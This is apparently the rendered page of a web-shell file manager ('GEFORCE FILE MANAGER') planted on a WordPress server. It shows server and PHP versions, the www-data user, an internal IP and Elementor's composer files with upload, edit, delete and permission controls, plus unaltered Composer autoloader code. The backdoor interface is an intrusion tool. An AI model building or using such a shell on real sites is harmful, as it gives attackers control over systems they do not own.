[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
vendor
/
composer
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 ClassLoader.php
16,378 B
SET
[ EDIT ]
|
[ DEL ]
📄 InstalledVersions.php
17,395 B
SET
[ EDIT ]
|
[ DEL ]
📄 LICENSE
1,070 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_classmap.php
27,996 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_files.php
229 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_namespaces.php
139 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_psr4.php
241 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_real.php
1,672 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_static.php
31,839 B
SET
[ EDIT ]
|
[ DEL ]
📄 installed.json
2,876 B
SET
[ EDIT ]
|
[ DEL ]
📄 installed.php
1,541 B
SET
[ EDIT ]
|
[ DEL ]
📄 platform_check.php
917 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: autoload_real.php
<?php // autoload_real.php @generated by Composer class ComposerAutoloaderInit382eb9b36683e56e031da07ecca1a2ca { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } /** * @return \Composer\Autoload\ClassLoader */ public static function getLoader() { if (null !== self::$loader) { return self::$loader; } require __DIR__ . '/platform_check.php'; spl_autoload_register(array('ComposerAutoloaderInit382eb9b36683e56e031da07ecca1a2ca', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__)); spl_autoload_unregister(array('ComposerAutoloaderInit382eb9b36683e56e031da07ecca1a2ca', 'loadClassLoader')); require __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInit382eb9b36683e56e031da07ecca1a2ca::getInitializer($loader)); $loader->register(true); $filesToLoad = \Composer\Autoload\ComposerStaticInit382eb9b36683e56e031da07ecca1a2ca::$files; $requireFile = \Closure::bind(static function ($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; require $file; } }, null, null); foreach ($filesToLoad as $fileIdentifier => $file) { $requireFile($fileIdentifier, $file); } return $loader; } }